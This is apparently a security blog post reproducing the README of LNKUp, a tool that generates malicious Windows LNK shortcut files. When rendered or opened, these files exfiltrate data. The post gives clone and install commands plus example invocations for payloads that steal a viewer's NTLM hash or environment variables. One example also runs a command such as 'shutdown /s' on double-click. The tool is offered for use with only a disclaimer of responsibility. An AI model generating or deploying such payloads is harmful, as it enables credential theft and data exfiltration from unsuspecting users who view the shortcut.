LNKUp: Generates malicious LNK file payloads for data exfiltration

by do son · Published · Updated

LNKUp

LNK Data exfiltration payload generator

This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.

Info

I am not responsible for any actions you take with this tool!
You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.

Known gotchas

  • This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
  • There may be issues with icon caching in some situations. If your payload doesn’t execute after the first time, try regenerating it.
  • You will need to run a responder or metasploit module server to capture NTLM hashes.
  • To capture environment variables, you’ll need to run a webserver like apache, nginx, or even just this

Installation

Install requirements using

git clone https://github.com/Plazmaz/LNKUp.git

cd LNKUp

pip install -r requirements.txt

Usage

Payload types:

  • NTLM
    • Steals the user’s NTLM hash when rendered.
    • Needs listener server such as this metasploit module
    • More on NTLM hashes leaking: https://dylankatz.com/NTLM-Hashes-Microsoft’s-Ancient-Design-Flaw/
    • Example usage:
      lnkup.py --host localhost --type ntlm --output out.lnk
  • Environment
    • Steals the user’s environment variables.
    • Examples: %PATH%, %USERNAME%, etc
    • Requires variables to be set using –vars
    • Example usage:
      lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk

       

Extra:

  • Use --execute to specify a command to run when the shortcut is double clicked
    • Example:
      lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"

       

Source: https://github.com/Plazmaz/LNKUp

Tags: LNKUp